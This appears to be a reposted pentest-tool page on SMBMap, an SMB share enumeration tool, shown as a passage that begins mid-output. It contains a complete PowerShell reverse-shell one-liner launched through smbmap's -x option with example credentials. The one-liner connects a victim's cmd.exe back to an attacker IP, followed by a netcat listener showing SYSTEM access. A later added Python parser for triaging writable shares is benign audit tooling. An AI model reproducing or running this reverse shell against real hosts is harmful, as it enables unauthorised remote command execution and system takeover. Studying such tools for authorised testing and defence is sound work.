Missing domain…defaulting to WORKGROUP[+] Finding open SMB ports….[+] User SMB session establishd…[+] IP: 192.168.1.24:445 Name: unkown [+] Host 192.168.1.24 Local Drives: C:\ D:\[+] Host 192.168.1.24 Net Drive(s): E: \\vboxsrv\Public VirtualBox Shared FoldersNifty Shell:Run Powershell Script on Victim SMB host (change the IP in the code to your IP addres, i.e where the shell connects back to)$ python smbmap.py -u jsmith -p ‘R33nisP!nckle’ -d ABC -H 192.168.2.50 -x ‘powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.153""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length – $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"’ [+] Finding open SMB ports….[+] User SMB session establishd…[+] IP: 192.168.2.50:445 Name: unkown [!] 
Error encountered, sharing violation, unable to retrieve outputAttackers Netcat Listener:$ nc -l 4445Microsoft Windows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\Windows\system32>whoami nt authority\systemDownload SMBMap
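The "Default Output" format shown above is what an auditor usually has to triage after a share-permission sweep: the interesting finding is a non-administrative share (TMPSHARE, print$) that the scanning account can write to. The parser below is an added example, not part of SMBMap itself; the sample output is constructed from the page's own listing, and the "READ ONLY" / "WRITE ONLY" permission strings it also accepts are an assumption about SMBMap's other output values.

```python
import re
from collections import defaultdict

# Constructed sample in SMBMap's "Default Output" format (two hosts, as on this page)
SAMPLE_OUTPUT = """\
[+] Finding open SMB ports....
[+] User SMB session establishd...
[+] IP: 192.168.0.5:445 Name: unkown
        Disk                                                    Permissions
        ----                                                    -----------
        ADMIN$                                                  READ, WRITE
        C$                                                      READ, WRITE
        IPC$                                                    NO ACCESS
        TMPSHARE                                                READ, WRITE
[+] User SMB session establishd...
[+] IP: 192.168.2.50:445 Name: unkown
        Disk                                                    Permissions
        ----                                                    -----------
        IPC$                                                    NO ACCESS
        print$                                                  READ, WRITE
        My Dirs                                                 NO ACCESS
"""

HOST_RE = re.compile(r"^\[\+\] IP: (?P<ip>[\d.]+):(?P<port>\d+)\s+Name: (?P<name>\S+)")
# Share names may contain single spaces ("My Dirs"), so split on the run of
# two or more spaces in front of the permission column, not on any whitespace.
# READ ONLY / WRITE ONLY are assumed alternatives; the page only shows the other two.
SHARE_RE = re.compile(
    r"^\s+(?P<share>.+?)\s{2,}(?P<perm>READ, WRITE|READ ONLY|WRITE ONLY|NO ACCESS)\s*$")
ADMIN_SHARES = {"ADMIN$", "C$", "IPC$"}  # default Windows administrative shares

def parse_smbmap(text):
    """Return {ip: {share: permission}} from SMBMap default output."""
    shares = defaultdict(dict)
    host = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:                      # a new host block starts here
            host = m.group("ip")
            continue
        m = SHARE_RE.match(line)
        if m and host:             # header/separator rows never match the perm column
            shares[host][m.group("share")] = m.group("perm")
    return dict(shares)

def writable_custom_shares(text):
    """Triage: non-administrative shares the scanning account can write to."""
    findings = []
    for ip, shares in parse_smbmap(text).items():
        for share, perm in shares.items():
            if share not in ADMIN_SHARES and "WRITE" in perm:
                findings.append((ip, share, perm))
    return sorted(findings)
```

Feed it the real tool's stdout (for example from a `--host-file` run) to get a list of shares whose ACLs need review, rather than reading the per-host tables by hand.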

Link: http://feedproxy.google.com/~r/PentestTools/~3/zyZB2g5xxOU/smbmap-samba-share-enumeration-tool.html